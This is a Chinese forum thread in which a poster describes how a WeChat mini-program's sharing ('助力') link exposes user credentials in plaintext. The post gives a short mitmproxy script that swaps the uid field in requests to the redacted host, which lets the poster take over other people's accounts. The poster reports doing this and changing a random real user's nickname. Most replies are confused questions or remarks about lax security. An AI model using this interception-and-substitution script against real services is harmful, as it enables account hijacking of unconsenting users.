网站 › 『移动安全区』 › 某小程序通过助力链接盗号

418 发表于 2024-11-4 14:04

某小程序通过助力链接盗号

本帖最后由 418 于 2024-11-4 19:43 编辑

又是上一个小程序，开发出来挨打（不是）

是盗小程序的账号，不是微信号~

助力玩法如下

image-20241104134623869.png

转发到群里，别人点进去就算助力成功

image-20241104134709385.png

浅浅抓个包，发现助力的jid(用户凭证)明文传输
image-20241104123656763.png

于是用mitmproxy写了个脚本
```python
from mitmproxy import http
from multy_account.account import uid_list

def request(flow: http.HTTPFlow) -> None:
    # pretty_host takes the "Host" header of the request into account,
    # which is useful in transparent mode where we usually only have the IP
    # otherwise.
    if flow.request.pretty_host == "xxx.xxxxxx.com":
      print(flow.request.url)
      # print(flow.request.urlencoded_form['uid'])
      if flow.request.urlencoded_form['uid']:
            flow.request.urlencoded_form['uid'] = uid_list
```


再次刷新小程序，成功获取到别人的账号

随机修改一位幸运观众的昵称 :D
javascript:;

慕浟佳〃井少年 发表于 2024-11-4 14:36

外包开发的吧或者是不注重安全的小公司

qqpoly 发表于 2024-11-5 08:06

很多小程序都在这个水准上，问题是有时候，逼迫你必须处理，比如娃娃上学有关的，你工作相关的

sharees 发表于 2024-11-6 17:12

看不懂就问，这是干什么用的

snowcatflyer 发表于 2024-11-7 08:52

qqpoly 发表于 2024-11-5 08:06
很多小程序都在这个水准上，问题是有时候，逼迫你必须处理，比如娃娃上学有关的，你工作相关的

环境换经济基本进入尾声，yinsi换经济正当时，大环境如此，非常难规范

AGLJX0651 发表于 2024-11-4 14:12

看不懂就问，这是干什么用的

YSYM1003 发表于 2024-11-4 14:23

看不懂就问，这是干什么用的

Ly1988 发表于 2024-11-4 14:33

看不懂就问，这是干什么用的

soyadokio 发表于 2024-11-4 14:39

这世界本就是个草台班子

wd12826 发表于 2024-11-4 14:44

看不懂就问，这是干什么用的

ok748521 发表于 2024-11-4 14:48

坑人的东西太多太多太多了

gggod 发表于 2024-11-4 14:49

这属于越权吧，没有鉴权呀直接uid登陆了吗

lauded 发表于 2024-11-4 14:51

感谢楼主分享

查看完整版本: 某小程序通过助力链接盗号